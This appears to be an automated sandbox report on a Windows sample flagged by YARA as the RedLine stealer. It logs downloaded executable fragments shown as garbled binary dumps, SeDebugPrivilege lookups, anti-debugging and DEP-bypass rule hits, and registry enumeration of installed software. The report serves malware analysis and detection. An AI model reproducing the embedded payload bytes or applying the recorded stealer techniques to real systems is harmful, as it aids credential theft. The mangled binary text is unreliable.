ÇEüëÇEüEüå]ÂUìQMüå]ÃÌÌÌÌÌUìQMüEüMUüEBEüå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüEüå]ÃUìQMüEü@å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUììMüMüèÏÿÿÿEøMüè´ÿÿÿPEPMøMøBÿÐEå]ÂÌÌÌÌÌÌÌÌÌUìQMüEüMUüEBEüå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüEüå]ÃUìQMüEü@å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQVMèÓÿÿÿPMèÊÿÿÿÈè£þÿÿ¶ÀÀtMè¤ÿÿÿðMèÿÿÿ;ðu ÇEüëÇEüEü^å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüEüPMQMè)ÿÿÿEå]ÂUììMüEPMQUôREüMüBÿÐPèXÿÿÿÄå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUììMøMèoþÿÿPMøèæýÿÿ¶ÀÀtMèGþÿÿ;Eu ÇEüëÇEüEüå]ÂÌÌÌÌÌÌÌÌÌUìèèPEPMèÛýÿÿE]ÃÌÌÌÌÌÌUììMè¶ÀÀu h¬MHMè¾MèQMèþÿÿPMèÙMèèURMèMèíEå]ÃÌÌÌÌÌÌUììMüìÌEPèMQUREäPèxÿÿÿÄ$PMüèLüÿÿMäè¤MüÇ´sGUüEMBJEüå]ÂÌÌÌUìQMüMüè!EàtjMüQèÄ0ÄEüå]ÂÌÌUìQMüMüèAüÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMüEPMäèMäQUREPMüè'ÿÿÿMäèÿMüÇÀsGEüå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüMüè!EàtjMüQè$0ÄEüå]ÂÌÌUìQMüMüèQÿÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUìQMüEPMüèMüÇÀsGEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUìQMüEPMüèmûÿÿMüÇ´sGUBJUüBJEüå]ÂÌÌÌÌÌÌÌÌÌUìQMü¸°MHå]ÃUììMü}uÇEøjhèNHMèËEëëEPè~ÄPMè?Eå]ÂÌÌÌÌÌÌUìQMüMüè!EàtjMüQè/ÄEüå]ÂÌÌUìQMüMüèûÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUìè]ÃÌÌÌÌÌÌUìQMüjh¼MHMüèjöÿÿEüÇÈyGEüå]ÃÌÌÌÌÌÌÌÌÌÌUìQMüMüè!EàtjMüQèt.ÄEüå]ÂÌÌUìQMüMüèöÿÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMôèrÿÿÿh¬»HEôPèÆSå]Ã request_handle: 0x00cc0018	1	1
InternetReadFile Dec. 7, 2022, 3:45 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¢Éà0¤µ à@ @4µOà,µ H.textÜ ¤ `.rsrc,à¨@@.reloc¸@BhµHô»$ùE0 us# ~ç%-&~æþ¾s$ %ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢( o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/ ,rãprp~( () +;rprap~( () o/ -{å(+{å( (0 þ 9~o1 (2 o3 o4 (5 {å((0 þ 95þ¶s6 ~è%-&~æþ¿s7 %è(+þ·s6 ~é%-&~æþÀs7 %é(+þ¸s6 ~ê%-&~æþÁs7 %ê(+oÙoÛþ¹s8 ~ë%-&~æþÂs9 %ë(+oÝoãþºs: ~ì%-&~æþÃs; %ì(+oßþ»s< ~í%-&~æþÄs= %í(+oá(+,[så%oÙ%rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ%r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ,oB (C :üÿÿÞþo Üo :áûÿÿÞ,o ÜÞ&Þ+Adå( µ=4&Zah0s? h%ÐÏ(D sE (F (G þ , ÝS(s¦h%Ð£(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+rpoo(I - o+rpoo(I - o+rpoÜorp(J ,oK Xo¥þ :úþÿÿÞÞÞÞ+AdzJÄzRÌoC8{}0ÇsL (F (G þ , Ý(s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!¶Yoñ%o«oH oó%o«(oõoðjþ,-(N (O (P !µ÷õYoñÞ&Þ-+(ô(I þ , oQ Xo¥þ:®þÿÿÞ&ÞÞÞ+AL` i-±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA(s¦h%Ð(D sE o©&8àh%Ð¬(D sE o§oH h%Ð§(D sE oR -h%ÐÒ(D sE oR + ,(s× h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ, oS Xo¥þ:ÿÿÿÞ ÞÞÞ+ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý(s¦r¡prp~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû request_handle: 0x00cc000c	1	1
InternetReadFile Dec. 7, 2022, 3:46 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ó þ}l.l.l.#ða.l.#ðc.l.#ðb.l. ÌW.l.¬2/l.¬2/l.¬2/¾l..l..l.l.ol.2/±l.2/l.2o.l.2/l.Richl.PELÝÆ_àböÐ=@@Á°4ä<Ðß`ô' øTH¢@ ¤.text`b `.rdata$f@@.dataM @À.didat\p@À.rsrcÐßà@@.relocô'`(ô@B¹pMCéÌÌÌÌÌÌh0pBè'YÃÌÌÌÌèY£ð¿CÃÌÌÌÌÌ¹ÀCéÃgÌÌÌÌÌÌ¹0ÅCèüÇh@pBè`'YÃÌÌÌÌÌÌÌÌÌÌ¹ðÀEè´FhPpBè@'YÃÌÌÌÌÌÌÌÌÌÌ¹tEéùÌÌÌÌÌÌ¹Eè(h`pBè'YÃÌÌÌÌÌÌÌÌÌÌ¹ú1FèdFhppBèð&YÃÌÌÌÌÌÌÌÌÌÌ¹rEèDFhpBèÐ&YÃÌÌÌÌÌÌÌÌÌÌ¹ðEèUhpBè°&YÃÌÌÌÌÌÌÌÌÌÌUìì,EüPÿ\pFÀt2ÀëfE3ÉEÜÔýÿÿEäEEèEÜVPMàÇEìAMðMôÿ`pFðöu2Àë)WÿuVÿdpFMüøVQrÎÿ BÿÖ3Àÿ_À^å]Â¶D$Pÿt$ÿt$ÿ4qFPÿ0qFÂ¶D$÷ØÀà Pÿt$ÿt$ÿ4qFPÿ<qFÂUì}0tY}u]E ¹E$¶ÀPÿuÿuè®5öE t>ÿuÿ(qFÀt1h!0Pÿ4qFÀt!öE thDBPÿ,qFë ÿu¹EèC52À]Â¸oBè"QVñuðè©eü£èyU\|£ÆEüèjUÜ£ÆEüè[U<¤ÆEüèLU¤ÆEüè=UÎÆEüèÈMôÆ^d å]ÃUìd¡jÿhµoBPd%Vñ>t~t FÀPÿ6è)Fÿ6èØtYMôd ^å]Ãé±ÿÿÿÁ<¤é©U¸ èÐ!SUVWjjÿ´$( è $ ØècV½é¢D$Pèí#ð·QèÄ"¼$ tÀt3ÀfëÀtUh@BD$PèöSjjD$ûPè£ðf>*u:·NQèy"Àt,j.Xj\f$XUf$$SPèÓS¼$ÿ´$( WVèüÀu'$ D$UPèKUÀDÿÿÿ_^][Ä Â°ëïUìVjÿuñÿuÿu\|£PèàþÿÿÀt°ë0}t(¾ô£tjÿuÜ£ÿuÿuPè²þÿÿöØÀþÀë2À^]ÂVñè3À£fúffðôøèæT\|£èÛTÜ£èÐT¤èÅT<¤èºTpa^éTQQSUVt$(Wùöt\|$0v3ÀfL$3ÛCSjñi(D$Ïÿt$l$ UèõþÿÿÀu4Ç£Ï\|$èlTÏëÿt$$UWèÀuL$Cè¥Søÿuá3À_^][YYÂl$ ítÿt$WèR÷ØÀþÀEötÿt$0WVèRÃëÉSUVWhp-CÙè$ºp1C¾üÿÿúj]¶ÁÁé3p-C¿íuæÂîuÓ_^]Ã[ÃUìUS]Vuöt öÂt¶ ¶Ã3ÈÁë3p-CBUîuàþWþÁï3îRÊÁéÂÁè¶Àp-C3p1CÂÁè¶À3p5CÃÁè3p=CÃÁè¶À3pACÃÁè¶À3pEC¶ÂUÂU3p9C¶Ã3pICÙïu_öt¶ ¶Ã3ÈÁë3p-CBîuè^Ã[]ÂT$3É9Ju'VjÁ^¨t Ñè5 ¸íëÑèîuìAùrÛ^ÂUììLÿuM´èyMôùs ED´ÿEôM´èM[å]ÂUììLÿuM´èHMôùsED´MôAMôùs ED´ÿEôM´è [å]Â3ÀÇAAfAÁÃVWñ¸DBjYþó«j 3ÿF WPèº-D$Ä~@~DFHÆ_^ÂVÿt$ñjè3ÿÿÿjÎèÃ^Âjè¸D$ÆÂVñ~ uÿt$ÿt$èo]ÀuÆF ë2À^ÂVñ~uÿt$j èÛþÿÿjÎèk^ÂVÿt$ñÿt$j èíþÿÿj ÎèL^ÂéUììEPjÿuøÿÿhPèÿÄøÿÿPjèvþÿÿå]ÃÿBÀt%jÿt$ÿt$hPjhÿB÷ØÀ÷Øë2ÀÂVñèjÎè^ÃUììLVñM´jè¢þÿÿM´èYjÎè ^å]ÃVñèCWÿt$ÿt$jèþÿÿjÎè{^Âÿt$jèÑÿÿÿÂVÿt$ñjè jÎè^ÂVÿt$ñÿt$jèÔýÿÿjÎè3^Âÿt$jèÖÿÿÿÂVñ~uÿt$jètýÿÿjÎèN^ÂT$Âètèt&èt-üu9uÿAÂ9tõÇëí9t9uãÇëÛÌÃUìQVuþÿu yu^å]ÂVèÿÿÿh¤þBEüuüPè{0Ìÿt$ÿt$j!è ýÿÿj¹tEèfÿÿÿÂVÿt$ñÿt$è jÎèÿÿÿ^ÂVÿt$ñÿt$j èÌüÿÿjÎè+ÿÿÿ^Â¸xMCÃUìÿuÿuÿuÿuÿuèãÿÿÿÿpÿ0èõÄÀyÈÿ]ÃIÿ3ÀÇHBfA$AAA$fA!A AÁÇAÇAÃ3À $ÁÃUìd¡jÿhµoBPd%yÿÇHBtyuytèëè>Môd å]ÃVñè®ÿÿÿöD$t h(VèÙYYÆ^ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌSVñ³~ÿt"~u~uÿvÿ,BXÿ÷ÛÛþÃNÿfÛu8^tF$¹tEPèFüÿÿ^Ã[Ã¸èS$ÃUÑèV$ñWöÃu request_handle: 0x00cc000c	1	1
InternetReadFile Dec. 7, 2022, 3:46 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL:ýà0¤²µ à@ @`µOà$Dµ H.text¡ ¤ `.rsrc$à¨@@.reloc¸@BµHô»PùE0 us# ~ç%-&~æþ¾s$ %ç(+o& 8o' f%rprYp~( () ¢%rqpr¯p~( () ¢%rÇprp~( () ¢%r!prap~( () ¢( o* 8u(+ sµså~( }å~( s, (- o. }å{årqprÑp~( () o/ ,rãprp~( () +;rprap~( () o/ -{å(+{å( (0 þ 9~o1 (2 o3 o4 (5 {å((0 þ 95þ¶s6 ~è%-&~æþ¿s7 %è(+þ·s6 ~é%-&~æþÀs7 %é(+þ¸s6 ~ê%-&~æþÁs7 %ê(+oÙoÛþ¹s8 ~ë%-&~æþÂs9 %ë(+oÝoãþºs: ~ì%-&~æþÃs; %ì(+oßþ»s< ~í%-&~æþÄs= %í(+oá(+,[så%oÙ%rip(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB (+,[så%oÙ%r{p(5 oÛ%s? oÝ%oã%s@ oß%sA oáoB ÞÞoäþ,oB (C :üÿÿÞþo Üo :áûÿÿÞ,o ÜÞ&Þ+Adå( µ=4&Zah0s? h%ÐÏ(D sE (F (G þ , ÝS(s¦h%Ð£(D sE o©&8òso«oH oo«oH oo«(oÞÞÞooÿ(I - oÿ+rpoo(I - o+rpoo(I - o+rpoÜorp(J ,oK Xo¥þ :úþÿÿÞÞÞÞ+AdzJÄzRÌoC8{}0ÇsL (F (G þ , Ý(s¦h%ÐÂ(D sE o©&8>sæ%o«oH oé%o«oH o1 .þoë%o«oH oí%o«o1 1þoï%o«oH (M @Bj[!¶Yoñ%o«oH oó%o«(oõoðjþ,-(N (O (P !µ÷õYoñÞ&Þ-+(ô(I þ , oQ Xo¥þ:®þÿÿÞ&ÞÞÞ+AL` i-±²¹0s@ h%ÐÆ(D sE (F (G þ , ÝA(s¦h%Ð(D sE o©&8àh%Ð¬(D sE o§oH h%Ð§(D sE oR -h%ÐÒ(D sE oR + ,(s× h%ÐÖ(D sE o§oH oÔ oÖ Þ&Þþ, oS Xo¥þ:ÿÿÿÞ ÞÞÞ+ALu¼1B&hjq0=sA h%ÐÆ(D sE (F (G þ ,Ý(s¦r¡prp~( () o©&8¡sþ%o«oH o÷%o«oH (T où%o«oH (T oû request_handle: 0x00cc000c	1	1
InternetReadFile Dec. 7, 2022, 3:46 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdécð#Tü9¾K@Ða h%HdÀaÕP3a,(WL0 2a0à1 .textLS `.rdata¨®p@@.data @À.pdata$À@@_RDATAP@@.vmp07y```.vmp1\|Û7à)Ü7`h.rsrcÕÀaà7@@1ZâËL_h{f D+xE\|b/GtyÒ@5$r~_e:©:·4>_Tv¯ªn/pH78zdgÔ=eEi;}Ölñót øgmj5OÉWÉ oßx¸I?=Ö+bc¯ ZE`$hØr#ôMán²-Wj8ì1e$øE81B8i0( ¤R%¤}c]$ÊM__±J`È\|XiO`X$ÑFEwÙJT]£:ÒmÓpÑ 2wâDqAjW( Lw3Qd±o«\|ÁMúK\|\|"¤+Nq´Vv@wKy]Y$ÍnéøÁ^O¤ù^OJ8R§°U]k¤°°.¤°>]VOôZOîzÚXO/NU©°íVO´å=[O(1<YO×RYOÈù ° À£°³£°]öQO¨û_]Onç!§°9cAâv(zZî T!tÔ<9Z½-@èc0ëÍÌV»G{xÙ½ðÀ(ÀãÂYnªíx¹ð+$WÓå¿à´MÛÕ`¦ðwúEúµ¿ð wN%ÔcÐ Cü c¯ðµÓ{¼©ð¨ ²èØÿ´'Áú;oUÝ¹]]uWÂDyú×¹/y£ ymò¬Ô. Míu=qy3íÿ?\|gyÞêyô)Ëõ`BìyÝ³ËYé îª0ydCK yGè ë×ÕéÆe®°Àó4¢°¶B °öQO[a-®°µý£°PIü¡°ô§¡°R`9XO=[OÈÛE[OF%6©°C¥°Î:±§°¯Î>VO©°Ì}V¤°øáW¦°$XQOT·É½IøÚ¶ðVcæÜÆy¹AÒ@nÈ«yYäÏET¬ð+ÃÁoöÔXÓç9ÇÆg9´¶+gKS-ðõ<9ì190-Ù_åÝÍL9(è f²ðÈ¯J §8LI9ÄÒ àÆvG<7âîìO#Gïÿÿÿ?¥÷[úKZ2K³ðS»Àül²D¬5§ôA¹Ê@>¼]À<Ö} ¸Òö§´0yø@ÂÖ³jO"+çwâa°ÕkFòÃ0Zé¸µ¯p?°ÍrmâÀbÑõh+HìÆ;´ÄACH>f]ò:ØF¥ÈÿJ%³ðL\oFµ´ðºû´ìÆÁD,¦ð[¦ðªt+þÆVÏ 9ÉB9È5ÊÆ¼)êíÆµ¸¸9d %ÊÆð@¡ïÆ.±19Mjã9>vßáÆ@-9TÉíÆÝDæÆ?â3.9ì 9GJ¾ûÆþ#.9Âr§9¼0ñÖÆkéÊ3^O^íü^OØjW§°ïçn¤° 9+¤°lXVOú©ñZOìßXOäP©°;èVO'8[OB[9YO¥WYOx ü °Å£°ZI£°wóQOÒáZ]OÜï»©°'RTâ@×ç½ä!ðððfAÊÒÆÍö;9sÀÆßà79Nm<9$ùôÆ5 ÅÓÆÔÙ!9u ôÆyÉÑÆà-9¤Ì69ç¯ðßÆQ$9å¦æÓÆª\|kØÆ>ã9Ã79ÖÛÅÆjÛ+9sÝ½]Oú+mPOolRO¢ROÆ©«°+#¨°æÕÕ¨°èK¦ZOÞÍVO\|!TOá®¥°e_ZOj;ÆWOnWÇUO2©UOÌ¬°;¯°î½~¯°Ðì«°ZKpâÀu#ÜD_9ËTçÆØÿ¸ÆC:Q9å;ÈªÆÉ,]9Ö¡V9r¯ÖÆ ¹ÆR_[K9ëÆÆßoB»Æ¡>áe9Òõ\9É<µÆQÎN9È¹ÆÜ §²ÆÈÐz9aX9u²ÆwÔ!æ4Þ>h=ÞêÖ!ÝW$ÞÈhÛ!OªÅ!ÏQ:Þts4Þó£Þ!ù óÏ!ø±-ÞdZÍ!lE®Ä!pÊ/ÞgUÝ!ºÜ®"Þ%Ð@<ÞUQ>Ò!ªß°aéù9Ð±È¢é);3»Z]ã5Îc#.rÌl4ûañváóü½5 PÅýè[\ÞaÎGðm^£H¼Üú¦ÿhêI·µ¥h&Òa¾Q§yï\|ZÎ¼>\]¿B,Êa7¢rçe=B¯Zª#SL¢3Æ?ãjÀÍýô[ð\|õ¹´HøgÃOó7×ak ¥ÉáÒÃºÒÔaå<?ÓJ£ æ¾M7¿Tâ<<Ñ¡5f·Zãf¾ÝwÝy%PÃa}ÑR4½ÄÅ(kïãÙ?yzTÒÿáªÍý,î<=!lQ¦ÿÿÿß3 µÈuÐs]CFÑaAléä6ß0¨Ø?¼HËcñÅr(ÉaàC6Ìe"¦1Q¡Õ÷{ç¼çb(¼NÓ\|%øÙvÞüPâwÞ>¢Õý#EÍb^E!]:°tQ¡ÑÈ¤ÿÞs\|ÃoW×ZÑ[Ðõ¥<ÍP["í®BM\GEO-Ú~Q»s·aô$Mæ5éQJiM¼ý©)jÿÎÁUG^3»ü-hH ?´þ´S¯üÑ,ÐM²Jó\|<§ÿaí¡ýeILInwboÅ¥ýOr7KãÒl¸ÿ»};D®_§KB¨@YoP3(Þ©\Ý6Þùg$É! ýÛÇ!õµÅ-Þÿ¨<ÞjêÞ!Æª>Þ²õ7Þ4þÜ!¹S.ÞâõÑ!{Ï!óâ0Þp>Þ7Ô!õ6nÅ!¼Ø,'Þä~®Ò!Þ,Þ°afëÃ9È¾ÏB$²=öÿ!AðýáäåÒÂ&.iôý+PSÀéÿÄ4N$Î xìü> ëüÆ¡[E8áíýîPÆÖÿSZm`?êü°ÄúävmýTf»)Þy$Û!¤âß$Þãæ1:Þ£=ÈÅ!`7Ë!?)!ÞvD0ÞôÒ!ôí2Þ`I;Þ¶\}Ð!Áâ"ÞÆÝ!a¤÷Ã!Á_<ÞÒ%ñ2ÞÝïØ!b,Ä!S°ôA÷9ÞÇèÊ2CwÐ¼íhÎ×¼dz:@û«<B¯Ñ½²>(ê¿ÇÌ8B qÖ¼©%@,}Ù¾ATÎÂ¼Àc C¬Ê'C¨ã~Ê¿î¯Ì½cj!BD¢,@xÈ½¤ZÝ¾÷Ô¿ÄS9`¬ÀÀÀ9Â¬KÅùOèÔÛ§)Xæ3êâûÔILDh}1ÉÌ(Hk(RÎF>¬²?_S§:äû_V´W+ar¢lÑ=±:g_t8~²õfùü96ñ;åØÿ ¿îÐÿälÚÐHs¨æð+#h!&Y¢O«³ãÏMð<7öSBrÖÿKÛëÖÿÛËåÓÿ2,T.¡ô©à}OÔÿÜs&ÃÃ·ÓLÚÿén-´§Û×ÿdkúäXZ´Ô3¶})¸Ó-ÿ»fû³0±é}5z&dçÍAsÀq]¬Móý~ß«z\¯>êô=ð 34'éFÿÿÿ!ýÆÍ¾·ÿ}°õü(q( µÊ®Ëe>ê)é'°ÿÊRÉÍÎígé3Q(4å²FÿÿÿýÏo9Iws0dxA+ù (S75(4}ù%×ËR)ÓËa)4åÔ^ÖË«+\|aâý1òûGì»~ëÃHhyð request_handle: 0x00cc000c	1	1
InternetReadFile Dec. 7, 2022, 3:46 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à¡Xxª°@@ðOà& àCODE `DATA´° @ÀBSSá Ð´À.idata&à´@À.edataOðÄ@P.relocàÆ@P.rsrc ä@P@ø@P@ StringX@X@¤<@°<@´<@¸<@¬<@$:@@:@\|:@TObjectd@TObjectX@System@ IInterfaceÀFSystemÿÿÌD$øé©KD$øéÇKD$øéÑKÌÌ±@»@Å@ÀFÑ@@L@Ý@L@@¤<@8\@D\@¸<@¬<@T\@@:@\|:@TInterfacedObjectÀÿ%¨áAÀÿ%¤áAÀÿ% áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%\|áAÀÿ%¼áAÀÿ%xáAÀÿ%¸áAÀÿ%táAÀÿ%páAÀÿ%láAÀÿ%háAÀÿ%dáAÀÿ%`áAÀÿ%\áAÀÿ%XáAÀÿ%TáAÀÿ%PáAÀÿ%LáAÀÿ%HáAÀÿ%´áAÀÿ%DáAÀÿ%@áAÀÿ%<áAÀÿ%ÌáAÀÿ%ÈáAÀÿ%ÄáAÀÿ%8áAÀÿ%4áAÀÿ%ÜáAÀÿ%ØáAÀÿ%ÔáAÀÿ%0áAÀÿ%,áAÀÿ%(áAÀÿ%$áAÀSÄ¼» TèYÿÿÿöD$,t·\$0ÃÄD[ÃÀÿ% áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀÿ%áAÀSÄô»àÕA;uYhDjè¦ÿÿÿD$\|$u3À$ëPD$ÜÕAD$£ÜÕA3ÀÐÒL$TÑT$T$ T$@øduÜD$D$D$$$Ä[Ã@ÃÀSVÄøòØèfÿÿÿD$\|$u3Àë:T$BFT$B$D$$D$X$T$PD$°YZ^[ÃÄøP$T$$L$ T$$JàÕA£àÕAYZÃÀSVWUÄøÙðüBCD$RÊ/M;Èuèÿÿÿ@@CëC;Ðuèqÿÿÿ@CD$;7u®ÓÆèúþÿÿÀu3ÀYZ]_^[Ã@SVWUÄð$ôD$ @;ÈØ>_ùz;ßrv;Èu!BAB)BxuVèðþÿÿëMØ>_ùz;ßu B)Bë3Z\$>.}+û\|$+ÈHT$èMþÿÿÀu3Àë°ë;D$Yÿÿÿ3ÀÄ]_^[ÃSVWÚðþ}¾ëÆÿÿæÿÿsjh Vjè4ýÿÿø;ÿt#Ó¸äÕAèÜýÿÿÀuhjPèýÿÿ3À_^[ÃSVWUÙòèÇCjh hUèáüÿÿø;ÿuÆÿÿæÿÿsjh VUè¼üÿÿ;t#Ó¸äÕAèeýÿÿÀuhjPèüÿÿ3À]_^[ÃSVWUÄèùôÇD$ÿÿÿÿ3ÉL$D$T$T$¡äÕAëkD$X;\$rRÃB;D$wE;\$s\$hh;l$vl$hj@PèüÿÿÀu ÇÀÕAèýÿÿD$¸äÕA;u3À\|$tD$D$+D$GÄ]_^[ÃÀSVWUÄèÙ$t$\|$l$ÐÊáðÿÿL$$ÂÿâðÿÿT$D$D$+D$C¡äÕAë[@@E;D$sD$E;D$vD$E;EsjhE+PPè&ûÿÿÀu3Àë¸äÕA;uÄ]_^[ÃSVWUÄè$t$\|$\$ÐêÅÿåðÿÿl$$âðÿÿT$D$D$+D$A¡äÕAëX@@;D$sD$;D$vD$;s h@+PPèwúÿÿÀu ÇÀÕA¸äÕA;uÄ]_^[ÃÀSVWUÄôÚðü½ôÕAÆÿ?æÀÿÿEëA;p4Ë@ÖèJþÿÿ;t_CBC)BxuGèûÿÿë>;/u»ÓÆèmüÿÿ;t&L$ÓÅèûÿÿ\|$uL$Sè"ýÿÿ3ÀÄ]_^[ÃÀSVWUÄè$úØt$½ôÕAÇÿ?çÀÿÿEë;.t;Xuï;Xu_;x×+P@AL$è5üÿÿ\|$t3L$T$Åèoúÿÿ\|$uL$T$D$èüÿÿ$3ÒéL$×Ãèîûÿÿ\|$t4L$T$Åè(úÿÿ\|$TÿÿÿL$T$D$è4üÿÿ$3ÒëRh;ÝuB;x;$Å×è×üÿÿ$8t.$@B$@)Bxuèùÿÿë$3ÒÄ]_^[ÃSÄèÙÿ?áÀÿÿ$ÐâÀÿÿT$D$;$v_ËT$+$$èýÿÿL$Ó¸ôÕAè]ùÿÿ\$ÛtL$T$ÃènûÿÿD$D$D$D$\|$tT$¸ôÕAè©ùÿÿë3ÀÄ[ÃÀUìQ3ÒUhì@dÿ2d"hÄÕAè¼÷ÿÿ=EÐAt hÄÕAè±÷ÿÿ¸äÕAèCøÿÿ¸ôÕAè9øÿÿ¸ ÖAè/øÿÿhøjè_÷ÿÿ£ÖA=ÖAt@¸ÖA3ÉLô@=uìÇEüÖAEüUüPEüUüEü£ÖAÆ¼ÕA3ÀZYYdhó@=EÐAt hÄÕAè!÷ÿÿÃé#ëå ¼ÕAY]ÃUì request_handle: 0x00cc000c	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 7, 2022, 3:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Dec. 7, 2022, 3:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (20 events)

description	Create a windows service	rule	Create_Service
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	RedLine stealer	rule	RedLine_Stealer_m_Zero

Queries for potentially installed applications (50 out of 102 events)

Time & API	Arguments	Status
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000001f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: 7-Zip base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: AddressBook base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Adobe AIR base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Connection Manager base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: DirectDrawEx base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: EditPlus base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Fontcore base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Google Chrome base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: IE40 base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: IE4Data base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
